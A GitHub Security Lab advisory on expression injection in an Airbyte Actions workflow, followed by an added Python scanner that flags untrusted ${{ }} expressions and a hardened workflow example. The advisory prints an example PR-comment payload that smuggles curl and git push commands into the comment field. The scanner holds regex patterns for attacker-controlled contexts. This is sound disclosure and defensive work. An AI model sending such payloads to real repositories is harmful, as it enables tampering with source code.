Coordinated Disclosure Timeline

Summary

Potential injection from the github.event.comment.body context, which may be controlled by an external user.

Product

Airbyte repository.

Tested Version

The master branch.

Details

Issue 1: Expression injection in Actions: .github/workflows/commands-for-testing-tool.yml: Line 111 (GHSL-2023-086)

The Actions workflow file commands-for-testing-tool.yml interpolates uncontrolled user input directly into a run command. Because the ${{ }} expression is expanded before the shell sees the script, an attacker may execute arbitrary code inside the Actions runner with the permissions granted to that runner.

- name: Run docker container with params
  run: docker run -v $(pwd)/secrets:/secrets -v $(pwd)/result:/result airbyte/airbyte-e2e-testing-tool:latest ${{ github.event.comment.body }}

Example exploit in a PR comment (pseudocode showing that an attacker could update the repository using the GitHub Actions runner; the curl target is left unspecified):

/run-scenario && curl [malicious file] && git add . && git commit -m "update" && git push origin develop:master

Impact

Since the workflow runs with contents: write permissions, a successful injection allows malicious modifications of the source repository.

Resources

CodeQL query here.

Issue 2: Expression injection in Actions: .github/workflows/commands-for-testing-tool.yml: Line 55 (GHSL-2023-087)

The Actions workflow file commands-for-testing-tool.yml interpolates uncontrolled user input directly into a run command. Because the ${{ }} expression is expanded before the shell sees the script, an attacker may execute arbitrary code inside the Actions runner with the permissions granted to that runner.

- name: Run docker container with params
  run: docker run -v $(pwd)/secrets:/secrets -v $(pwd)/result:/result airbyte/airbyte-e2e-testing-tool:latest ${{ github.event.comment.body }}

Example exploit in a PR comment (pseudocode showing that an attacker could update the repository using the GitHub Actions runner; the curl target is left unspecified):

/run-scenario && curl [malicious file] && git add . && git commit -m "update" && git push origin develop:master

Impact

Since the workflow runs with contents: write permissions, a successful injection allows malicious modifications of the source repository.
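Both issues above have the same shape: a user-controlled context expanded by ${{ }} inside a run: step. The following is an added example, not code from the Airbyte project or from this advisory. It is a line-based scanner that flags ${{ }} expressions referencing attacker-influenced contexts inside run: values, and it carries two constructed workflow fragments as sample input: the vulnerable step from the advisory, and a hardened form that routes the comment body through an environment variable, allow-lists its shape in bash before use, and drops the job to contents: read. The list of untrusted contexts follows GitHub's published script-injection guidance but is abbreviated; the allow-list regex and the pattern name COMMENT_BODY are assumptions chosen for illustration.

```python
"""Scan GitHub Actions workflow text for expression injection in run: steps.

Added example: a simplified, regex-based stand-in for what a CodeQL query does.
It does not parse YAML fully; it recognises `run: value` and `run: |` / `run: >`
block scalars by indentation, which covers the common workflow layouts.
"""
import re
from typing import List, Tuple

# Contexts an external user can influence through issues, PRs, comments or pushes.
# Abbreviated from GitHub's script-injection guidance (assumption: not exhaustive).
UNTRUSTED_CONTEXT_PATTERNS = [
    r"github\.event\.comment\.body",
    r"github\.event\.issue\.(title|body)",
    r"github\.event\.pull_request\.(title|body|head\.ref|head\.label|head\.repo\.default_branch)",
    r"github\.event\.review\.body",
    r"github\.event\.review_comment\.body",
    r"github\.event\.pages\b.*page_name",
    r"github\.event\.commits\b.*(message|author\.(name|email))",
    r"github\.event\.head_commit\.(message|author\.(name|email))",
    r"github\.head_ref",
]
UNTRUSTED_RE = re.compile("|".join(f"(?:{p})" for p in UNTRUSTED_CONTEXT_PATTERNS))
EXPR_RE = re.compile(r"\$\{\{(.*?)\}\}")          # one ${{ ... }} expression
RUN_KEY_RE = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")  # `run:` or `- run:` key


def run_lines(workflow: str) -> List[Tuple[int, str]]:
    """Return (1-based line number, text) for every line that is part of a run: value."""
    lines = workflow.splitlines()
    out: List[Tuple[int, str]] = []
    i = 0
    while i < len(lines):
        m = RUN_KEY_RE.match(lines[i])
        if not m:
            i += 1
            continue
        key_indent = len(m.group(1))   # column of the `run` key
        value = m.group(2)
        if value.startswith(("|", ">")):
            # Block scalar: consume following lines indented deeper than the key.
            i += 1
            while i < len(lines):
                line = lines[i]
                indent = len(line) - len(line.lstrip(" "))
                if line.strip() and indent <= key_indent:
                    break
                if line.strip():
                    out.append((i + 1, line))
                i += 1
            continue
        out.append((i + 1, value))
        i += 1
    return out


def scan(workflow: str) -> List[Tuple[int, str]]:
    """Return (line number, expression) for each untrusted ${{ }} inside a run: value."""
    findings: List[Tuple[int, str]] = []
    for line_no, text in run_lines(workflow):
        for m in EXPR_RE.finditer(text):
            expr = m.group(1).strip()
            if UNTRUSTED_RE.search(expr):
                findings.append((line_no, expr))
    return findings


# Constructed sample 1: the step reported in the advisory (expression inside run:).
VULNERABLE_STEP = """\
- name: Run docker container with params
  run: docker run -v $(pwd)/secrets:/secrets -v $(pwd)/result:/result airbyte/airbyte-e2e-testing-tool:latest ${{ github.event.comment.body }}
"""

# Constructed sample 2: hardened form (assumed fix, not the project's own patch).
# The expression lands in an env var, so the shell only ever sees "$COMMENT_BODY";
# the bash regex allow-lists the command shape, and contents: read removes the write impact.
HARDENED_STEP = """\
permissions:
  contents: read
steps:
  - name: Run docker container with params
    env:
      COMMENT_BODY: ${{ github.event.comment.body }}
    run: |
      pattern='^/run-scenario( [A-Za-z0-9_.-]+)*$'
      [[ "$COMMENT_BODY" =~ $pattern ]] || { echo "rejected comment"; exit 1; }
      # Unquoted on purpose: the allow-list admits no shell metacharacters, so
      # word splitting into separate tool arguments is safe.
      docker run -v "$(pwd)/secrets:/secrets" -v "$(pwd)/result:/result" \\
        airbyte/airbyte-e2e-testing-tool:latest $COMMENT_BODY
"""

if __name__ == "__main__":
    for name, wf in (("vulnerable", VULNERABLE_STEP), ("hardened", HARDENED_STEP)):
        print(name, scan(wf))
```

Run as a script it reports the vulnerable step at line 2 and nothing for the hardened one. The scanner deliberately ignores expressions under env:, because that is the safe place for them: GitHub evaluates the expression into a variable, and the shell then handles the value as data rather than as script text.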

Credit

These issues were discovered and reported by GitHub employees @leftrightleft (Dan Shanahan) and @ngonz (Nick Gonzalez).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2023-086 or GHSL-2023-087 in any communication regarding these issues.